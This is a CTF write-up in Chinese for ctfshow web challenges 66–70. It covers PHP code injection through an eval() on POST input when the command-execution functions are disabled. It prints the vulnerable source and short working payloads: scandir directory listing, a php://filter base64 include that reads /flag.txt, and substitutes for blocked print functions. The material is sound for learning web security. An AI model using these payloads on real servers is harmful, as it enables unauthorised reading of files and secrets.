ctfshow(66->70)--RCE/命令执行漏洞--禁用命令执行函数

Web66

源代码:

复制代码
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

代码审计:

POST传参c,eval进行代码执行。

思路:

由于题目过滤了命令执行函数,所以使用其他方法进行RCE。

先使用c=var_dump(scandir("."))查看当前目录下的文件,发现了flag.php
highlight_file('flag.php')查看发现没有flag.

于是使用c=var_dump(scandir("/"))查看根目录,发现flag.txt

EXP:

复制代码
c=highlight_file('/flag.php');

得到flag.

Web67

与上一题做法相同。

Web68

进入界面,回显为一个报错:

代码审计:

说明highlight_file()函数被禁用了。

思路:

用php伪协议查看文件内容。

EXP:

复制代码
c=include($_POST[1]);&1=php://filter/convert.base64-encode/resource=/flag.txt

base64解码得到flag.

Web69

回显与上一题相同。

思路

查看目录下的文件:

复制代码
c=var_dump(scandir("/"));
c=print_r(scandir("/"));

发现两个打印函数都被过滤了。

替换为var_export或implode即可。

EXP:

查看目录:

复制代码
c=var_export(scandir("/"));
c=echo implode("--",scandir("/"));

读取文件内容:

复制代码
c=include("/flag.txt");

Web 70

与上一题做法相同。

相关推荐
emma羊羊3 小时前
【PHP反序列化】css夺旗赛
开发语言·网络安全·php
CyberSecurity_zhang4 小时前
一文理清汽车网络安全法规
网络·安全·web安全
深耕AI5 小时前
【宝塔面板】监控、日志、任务与安全设置
安全·github
jenchoi4135 小时前
软件供应链npm/pypi投毒预警情报【2025-11-09】
前端·安全·web安全·网络安全·npm·node.js
Acrelhuang7 小时前
从 “被动抢修” 到 “主动防控”,安科瑞 mini 智能微断,重构末端配电安全新逻辑
安全·重构
AI分享猿15 小时前
雷池 WAF 免费版实测:企业用 Apache 搭环境,护住跨境电商平台
web安全·github·apache
金士镧(厦门)新材料有限公司15 小时前
如何让PVC制品更安全?稀土抑烟剂助力安全防护
科技·安全·全文检索
介一安全19 小时前
【Frida Android】实战篇3:基于 OkHttp 库的 Hook 抓包
android·okhttp·网络安全·frida
云飞云共享云桌面19 小时前
三维设计办公资源如何共享集中和安全管控?
运维·服务器·数据库·安全·自动化·制造
EkihzniY19 小时前
配合式活体检测:让身份核验安全又便捷
安全